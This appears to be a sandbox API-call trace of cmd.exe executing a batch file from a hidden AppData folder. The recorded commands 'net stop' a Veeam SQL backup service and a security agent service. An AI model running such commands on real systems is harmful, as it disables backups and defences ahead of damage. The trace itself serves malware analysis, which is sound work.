GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.093] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.093] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.094] SetConsoleInputExeNameW () returned 0x1 [0198.094] GetConsoleOutputCP () returned 0x1b5 [0198.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.094] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0198.094] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0198.094] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.094] SetFilePointer (in: hFile=0x78, lDistanceToMove=2655, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa5f [0198.094] GetProcessHeap () returned 0x3e0000 [0198.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.094] GetProcessHeap () returned 0x3e0000 [0198.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.094] GetProcessHeap () returned 0x3e0000 [0198.094] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.094] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.095] GetProcessHeap () returned 0x3e0000 [0198.095] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.095] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.095] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa5f [0198.095] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe62, lpOverlapped=0x0) returned 1 [0198.095] SetFilePointer (in: hFile=0x78, lDistanceToMove=2689, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa81 [0198.095] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=34, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$VEEAMSQL2008R2 /y\r\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 34 [0198.096] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.096] GetFileType (hFile=0x78) returned 0x1 [0198.096] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.096] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa81 [0198.096] GetProcessHeap () returned 0x3e0000 [0198.096] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.096] GetProcessHeap () returned 0x3e0000 [0198.096] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.099] _tell (_FileHandle=3) returned 2689 [0198.099] _close (_FileHandle=3) returned 0 [0198.099] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.099] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.099] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.099] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.100] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.100] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.100] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.100] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.100] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.100] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.100] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.100] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.100] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.100] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.100] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.100] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.100] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.100] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.100] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.100] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.100] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.100] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.100] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.100] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.100] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.100] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.100] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.100] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.100] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.100] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.100] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.100] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.100] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.100] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.100] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.100] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.100] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.100] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.100] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.100] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.100] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.101] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.101] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.101] SetErrorMode (uMode=0x0) returned 0x1 [0198.101] GetProcessHeap () returned 0x3e0000 [0198.101] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.101] GetProcessHeap () returned 0x3e0000 [0198.101] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.102] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.102] GetProcessHeap () returned 0x3e0000 [0198.102] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.102] GetProcessHeap () returned 0x3e0000 [0198.102] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.103] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.103] GetLastError () returned 0x2 [0198.103] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.103] GetLastError () returned 0x2 [0198.104] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.104] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.104] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.104] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.105] GetLastError () returned 0x2 [0198.105] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.105] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.105] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.106] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.106] SetErrorMode (uMode=0x0) returned 0x1 [0198.106] GetProcessHeap () returned 0x3e0000 [0198.106] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.106] GetProcessHeap () returned 0x3e0000 [0198.106] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.107] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.107] GetProcessHeap () returned 0x3e0000 [0198.107] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0198.107] GetProcessHeap () returned 0x3e0000 [0198.107] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0198.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.108] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.108] GetLastError () returned 0x2 [0198.108] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.108] GetLastError () returned 0x2 [0198.109] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.109] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.109] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.110] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.110] GetLastError () returned 0x2 [0198.110] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.110] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.111] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.111] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0198.111] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0198.111] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0198.111] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0198.111] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$VEEAMSQL2008R2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$VEEAMSQL2008R2 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x958, dwThreadId=0x9f0)) returned 1 [0198.115] CloseHandle (hObject=0x78) returned 1 [0198.115] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.115] GetProcessHeap () returned 0x3e0000 [0198.115] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.115] GetEnvironmentStringsW () returned 0x3f8408* [0198.115] GetProcessHeap () returned 0x3e0000 [0198.115] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.115] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.115] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0198.241] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.241] CloseHandle (hObject=0x74) returned 1 [0198.241] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.241] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.242] GetProcessHeap () returned 0x3e0000 [0198.242] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.242] GetEnvironmentStringsW () returned 0x3f8408* [0198.242] GetProcessHeap () returned 0x3e0000 [0198.242] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.242] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.242] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.242] GetProcessHeap () returned 0x3e0000 [0198.242] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.242] GetEnvironmentStringsW () returned 0x3f8408* [0198.242] GetProcessHeap () returned 0x3e0000 [0198.242] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.242] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.242] GetProcessHeap () returned 0x3e0000 [0198.242] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.242] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.242] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.242] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.242] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.242] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.242] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.242] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.243] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.243] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.243] SetConsoleInputExeNameW () returned 0x1 [0198.243] GetConsoleOutputCP () returned 0x1b5 [0198.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.243] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0198.243] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0198.243] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.243] SetFilePointer (in: hFile=0x74, lDistanceToMove=2689, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa81 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.244] GetProcessHeap () returned 0x3e0000 [0198.244] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.244] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.244] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa81 [0198.244] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe40, lpOverlapped=0x0) returned 1 [0198.244] SetFilePointer (in: hFile=0x74, lDistanceToMove=2711, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa97 [0198.244] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop klnagent /y\r\nL2008R2 /y\r\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 22 [0198.245] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.245] GetFileType (hFile=0x74) returned 0x1 [0198.245] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.245] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa97 [0198.245] GetProcessHeap () returned 0x3e0000 [0198.245] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.245] GetProcessHeap () returned 0x3e0000 [0198.245] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.249] _tell (_FileHandle=3) returned 2711 [0198.249] _close (_FileHandle=3) returned 0 [0198.249] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.249] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.249] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.249] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.249] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.249] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.249] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.249] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.249] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.249] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.249] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.249] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.249] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.249] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.249] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.249] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.249] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.249] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.249] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.249] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.249] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.249] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.249] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.249] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.249] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.249] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.249] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.249] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.249] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.249] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.249] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.249] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.250] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.250] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.250] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.250] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.250] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.250] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.250] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.250] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.250] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.250] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.250] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.250] SetErrorMode (uMode=0x0) returned 0x1 [0198.251] GetProcessHeap () returned 0x3e0000 [0198.251] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.251] GetProcessHeap () returned 0x3e0000 [0198.251] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.251] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.251] GetProcessHeap () returned 0x3e0000 [0198.251] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.251] GetProcessHeap () returned 0x3e0000 [0198.251] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.251] GetDriveTypeW (lpRootPathName="C:\\") returned 